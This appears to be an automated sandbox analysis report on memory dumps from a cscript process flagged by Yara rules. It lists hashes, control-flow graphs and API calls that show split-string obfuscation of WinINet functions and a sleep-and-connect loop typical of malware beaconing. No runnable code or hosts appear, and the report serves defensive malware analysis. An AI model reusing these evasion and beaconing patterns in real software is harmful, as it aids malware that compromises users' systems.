                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 0993a0ccad8107bf1daf4357556edf16e3567a40680a2c976588d468cf0cf288
                                                                                                                                      • Instruction ID: bc007c7397b528102f965c0b4ede0f49c819d3e0a0e0cc2fe67d644d382b6faf
                                                                                                                                      • Opcode Fuzzy Hash: 0993a0ccad8107bf1daf4357556edf16e3567a40680a2c976588d468cf0cf288
                                                                                                                                      • Instruction Fuzzy Hash: 1690026174150442F60475584514B060005C7E1345F51C419E1065654DDA29DC627527
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 130071800729c8a9beed539aa933de7d46025dc52dff2df64ed89e3ff9b72377
                                                                                                                                      • Instruction ID: 266c85783e00653bae2bf31fa303cc170796558f5479a84f340ea36accb54bc0
                                                                                                                                      • Opcode Fuzzy Hash: 130071800729c8a9beed539aa933de7d46025dc52dff2df64ed89e3ff9b72377
                                                                                                                                      • Instruction Fuzzy Hash: 7D900221611D0042F70479684D14B07000587D0347F51C519A0155654CDD25DC716922
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 8af6b021e12bc8259c35c47cbb16fe7b25a1a3412078dd9a691cad9802564a3f
                                                                                                                                      • Instruction ID: 0eec469b9962ec793762d9b8fd2ec1bf84257bb524759b63c9d67cd6c9005e38
                                                                                                                                      • Opcode Fuzzy Hash: 8af6b021e12bc8259c35c47cbb16fe7b25a1a3412078dd9a691cad9802564a3f
                                                                                                                                      • Instruction Fuzzy Hash: B7900225611500032609B9580704507004687D5395351C425F1016650CEA31DC716522
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 45d199223aa7c3badb44ce92dd115cce7ae0dd097c9b3850f7b2a3a4f2e12b40
                                                                                                                                      • Instruction ID: bc34291233acbafb49253ccffe74726230c945a2c602d4c7f7ddc9ff11875946
                                                                                                                                      • Opcode Fuzzy Hash: 45d199223aa7c3badb44ce92dd115cce7ae0dd097c9b3850f7b2a3a4f2e12b40
                                                                                                                                      • Instruction Fuzzy Hash: 4E90026160250003660975584514616400A87E0245B51C425E1015690DD935DCA17526
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 4ce20c1265921f089e2cbc5f9404af04519b10dadb43ad3839af633246ac7fa3
                                                                                                                                      • Instruction ID: d02db885918d973b14d6a98fab3f574f57efc7a788c9ea78b28873a37e43cb78
                                                                                                                                      • Opcode Fuzzy Hash: 4ce20c1265921f089e2cbc5f9404af04519b10dadb43ad3839af633246ac7fa3
                                                                                                                                      • Instruction Fuzzy Hash: E190023160554842F64475584504A46001587D0349F51C415A0065794DEA35DD65BA62
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 680a609a6c99ef95569cc85684ebd47136b1531369bbcf3e268f666610291c28
                                                                                                                                      • Instruction ID: 20eafa08670d30d762ef0c087a5f685dd2e8ccb34c85398efb1cfac084009622
                                                                                                                                      • Opcode Fuzzy Hash: 680a609a6c99ef95569cc85684ebd47136b1531369bbcf3e268f666610291c28
                                                                                                                                      • Instruction Fuzzy Hash: 0190023160150802F6847558450464A000587D1345F91C419A0026754DDE25DE697BA2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: c1cd8e9f0b1c3b4aecb1f698192e54e2e773a77d89c5f864f86666aef1ff135f
                                                                                                                                      • Instruction ID: 5dca4199b3e32e4d67915b259122bb73f02da777a356bf26c7af68dd111cf607
                                                                                                                                      • Opcode Fuzzy Hash: c1cd8e9f0b1c3b4aecb1f698192e54e2e773a77d89c5f864f86666aef1ff135f
                                                                                                                                      • Instruction Fuzzy Hash: C990023160150402F60479985508646000587E0345F51D415A5025655EDA75DCA17532
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: e824024fe5ffe73813547370e985ba6f0782a02519ad48bb479d840ab3e351f5
                                                                                                                                      • Instruction ID: d77e2745ed0d81f7d4cb5c7a87bc278a09d066e0aaabb73791f595addd7b6d01
                                                                                                                                      • Opcode Fuzzy Hash: e824024fe5ffe73813547370e985ba6f0782a02519ad48bb479d840ab3e351f5
                                                                                                                                      • Instruction Fuzzy Hash: 3F90023160150842F60475584504B46000587E0345F51C41AA0125754DDA25DC617922
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 189985e4b71861d580e60291d34187c818684b973262be6c394fe6ca90d20ace
                                                                                                                                      • Instruction ID: 073579cb83797451ad1e6e2139c9a8589ebe8ce9b9dda6e08f0027d598e2d1d8
                                                                                                                                      • Opcode Fuzzy Hash: 189985e4b71861d580e60291d34187c818684b973262be6c394fe6ca90d20ace
                                                                                                                                      • Instruction Fuzzy Hash: 1590023160158802F6147558850474A000587D0345F55C815A4425758DDAA5DCA17522
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 3477a8ca192c2e69493645d8290dbbeb5c25f56dcbbb8609efc4e1ac5265af47
                                                                                                                                      • Instruction ID: 61075b1fa4c60787ef881977d81480e1ffa17adb8f60d3a94ba95f8ad7191408
                                                                                                                                      • Opcode Fuzzy Hash: 3477a8ca192c2e69493645d8290dbbeb5c25f56dcbbb8609efc4e1ac5265af47
                                                                                                                                      • Instruction Fuzzy Hash: A4900231A0560402F60475584614706100587D0245F61C815A0425668DDBA5DD6179A3
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 106 21aaa70-21aaab6 call 21ab010 109 21aaab8-21aaade HttpOpenRequestA 106->109 110 21aaadf-21aaae5 106->110
                                                                                                                                      APIs
                                                                                                                                      • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 021AAAD8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HttpOpenRequest
                                                                                                                                      • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                                                                                      • API String ID: 1984915467-4016285707
                                                                                                                                      • Opcode ID: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
                                                                                                                                      • Instruction ID: c7232d9815b125ef7134f2165e6026c08ca879c37297efbf610cd866696708ec
                                                                                                                                      • Opcode Fuzzy Hash: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
                                                                                                                                      • Instruction Fuzzy Hash: E601E9B2905259AFCB04DF98D941EEF7BB9EB48214F158288FD49A7204D630EE10CBE1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 111 21aaaf0-21aab36 call 21ab010 114 21aab38-21aab52 HttpSendRequestA 111->114 115 21aab53-21aab59 111->115
                                                                                                                                      APIs
                                                                                                                                      • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 021AAB4C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HttpRequestSend
                                                                                                                                      • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                                                                      • API String ID: 360639707-2503632690
                                                                                                                                      • Opcode ID: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
                                                                                                                                      • Instruction ID: 2f1255bd3ec438ac59ef2dd38a9cc918f1449cdc79b832ba8173914a73ec3cdf
                                                                                                                                      • Opcode Fuzzy Hash: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
                                                                                                                                      • Instruction Fuzzy Hash: FC014BB2909119AFCB14DF98D841AAFBBB8EB58210F148189FD18A7304D770EE10CBE1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 116 21aa9f0-21aaa36 call 21ab010 120 21aaa38-21aaa5e InternetConnectA 116->120 121 21aaa5f-21aaa65 116->121
                                                                                                                                      APIs
                                                                                                                                      • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 021AAA58
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ConnectInternet
                                                                                                                                      • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                                                                      • API String ID: 3050416762-1024195942
                                                                                                                                      • Opcode ID: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
                                                                                                                                      • Instruction ID: 52502a3439f9c432667b39765427978f03222e570e2e667309c28f9768bd8d60
                                                                                                                                      • Opcode Fuzzy Hash: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
                                                                                                                                      • Instruction Fuzzy Hash: 8B0129B2905118AFCB04DF98D941EEF77B9EB48310F054288BE08A7200D630EE10CBE1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 122 21aa980-21aa9af 123 21aa9ba-21aa9c1 122->123 124 21aa9b5 call 21ab010 122->124 125 21aa9de-21aa9e4 123->125 126 21aa9c3-21aa9dd InternetOpenA 123->126 124->123
                                                                                                                                      APIs
                                                                                                                                      • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 021AA9D7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InternetOpen
                                                                                                                                      • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                                                                      • API String ID: 2038078732-3155091674
                                                                                                                                      • Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
                                                                                                                                      • Instruction ID: 9807cacfb5289b2c53892ad1a6bc8c7b0f42254088cf46d4075ab3702ac254e6
                                                                                                                                      • Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
                                                                                                                                      • Instruction Fuzzy Hash: 20F019B6901218AF8B14DF98DD419FBB7B8FF48310B048589BE5897201D735AA50CBE1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 127 21aa979-21aa97a 128 21aa97c-21aa9c1 call 21ab010 127->128 129 21aa977 127->129 132 21aa9de-21aa9e4 128->132 133 21aa9c3-21aa9dd InternetOpenA 128->133
                                                                                                                                      APIs
                                                                                                                                      • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 021AA9D7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InternetOpen
                                                                                                                                      • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                                                                      • API String ID: 2038078732-3155091674
                                                                                                                                      • Opcode ID: 9ef4b628281c834a97b41797ed20c9e3de48b80d6172e481f1b57f1b4e9be5ff
                                                                                                                                      • Instruction ID: d65a17b205b7986534480a627fa5aceed60281c9a7ac155bc1a6e377b4c4ecd3
                                                                                                                                      • Opcode Fuzzy Hash: 9ef4b628281c834a97b41797ed20c9e3de48b80d6172e481f1b57f1b4e9be5ff
                                                                                                                                      • Instruction Fuzzy Hash: A9F08CB1901219AFCB14DF88DC419EF7BB9FF44310B04868DAA1867201C3356A10CBE0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 165 21aaa66-21aaa69 166 21aaa6b 165->166 167 21aaa34-21aaa36 165->167 168 21aaa38-21aaa5e InternetConnectA 167->168 169 21aaa5f-21aaa65 167->169
                                                                                                                                      APIs
                                                                                                                                      • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 021AAA58
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ConnectInternet
                                                                                                                                      • String ID: ConnectA$InternetConnectA$rnetConnectA
                                                                                                                                      • API String ID: 3050416762-2730666810
                                                                                                                                      • Opcode ID: 6c4d9b5c0e818e06fcad38daf3a6a20b919fdfce3f85e4915b235cd264e2e341
                                                                                                                                      • Instruction ID: 4d97024e12f5fc1a2d8c7b93095e44876953f468668861224759926d3eb12330
                                                                                                                                      • Opcode Fuzzy Hash: 6c4d9b5c0e818e06fcad38daf3a6a20b919fdfce3f85e4915b235cd264e2e341
                                                                                                                                      • Instruction Fuzzy Hash: 07E0E5B662110DAB8B14CE98EC90DEB73EDEF8C614B044208BE0DD7200C630EC11CBA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 382 21a9080-21a90c2 call 21abd40 385 21a90c8-21a9118 call 21abe10 call 219acf0 call 21a4e50 382->385 386 21a919c-21a91a2 382->386 393 21a9120-21a9131 Sleep 385->393 394 21a9133-21a9139 393->394 395 21a9196-21a919a 393->395 396 21a913b-21a915c call 21a8ca0 394->396 397 21a9163-21a9183 394->397 395->386 395->393 401 21a9161 396->401 399 21a9189-21a918c 397->399 400 21a9184 call 21a8eb0 397->400 399->395 400->399 401->399
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 021A9128
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                                      • Opcode ID: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
                                                                                                                                      • Instruction ID: abaf3e87124e1ee7df06f0ae4a98730dac4adc640de52c4346b0d2f4238a91a7
                                                                                                                                      • Opcode Fuzzy Hash: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
                                                                                                                                      • Instruction Fuzzy Hash: 413190B6940344BFC724DF64C899FA7B7B9EB48B00F10811DF62A9B245D734B650CBA4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 402 21a9079-21a90c2 call 21abd40 406 21a90c8-21a9118 call 21abe10 call 219acf0 call 21a4e50 402->406 407 21a919c-21a91a2 402->407 414 21a9120-21a9131 Sleep 406->414 415 21a9133-21a9139 414->415 416 21a9196-21a919a 414->416 417 21a913b-21a9161 call 21a8ca0 415->417 418 21a9163-21a9183 415->418 416->407 416->414 420 21a9189-21a918c 417->420 418->420 421 21a9184 call 21a8eb0 418->421 420->416 421->420
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 021A9128
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                                      • Opcode ID: 0fb0c71abc52a88ea8cfbaf3c78401d3afc70d146283a4b66439d8a3ff85d379
                                                                                                                                      • Instruction ID: 0eb4d420b16f193c6f855e02ef23b54d3073f29dea8ff959d7f49681c70d0cb3
                                                                                                                                      • Opcode Fuzzy Hash: 0fb0c71abc52a88ea8cfbaf3c78401d3afc70d146283a4b66439d8a3ff85d379
                                                                                                                                      • Instruction Fuzzy Hash: 2A21A2B6940344BFC714DF64CC95B67B7B9FB48B04F10801DE62D5B245D774A550CBA4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02193AF8), ref: 021AA69D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeHeap
                                                                                                                                      • String ID: .z`
                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                      • Opcode ID: fb461ea170c5daf3bbe360725efa13ce95292284c4caf2a4258c1d2eac53cd1d
                                                                                                                                      • Instruction ID: 3c1fdfd4338060f2c87bc791fd67b9b88aca5e93434fb6a8490167d4d53cb96e
                                                                                                                                      • Opcode Fuzzy Hash: fb461ea170c5daf3bbe360725efa13ce95292284c4caf2a4258c1d2eac53cd1d
                                                                                                                                      • Instruction Fuzzy Hash: 08E06DB52406096FDB18DFA4CC44EAB7768EF88310F254544FD195B252D231E805CAB1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02193AF8), ref: 021AA69D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeHeap
                                                                                                                                      • String ID: .z`
                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                      • Instruction ID: 78d8affe7833cb46455514845429d8454b0904359f9c828be22fbe18fbb7f425
                                                                                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                      • Instruction Fuzzy Hash: 25E04FB52002086FD718DF59CC44EA777ADEF88750F118554FD0857241C630F910CAF0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0219836A
                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0219838B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1836367815-0
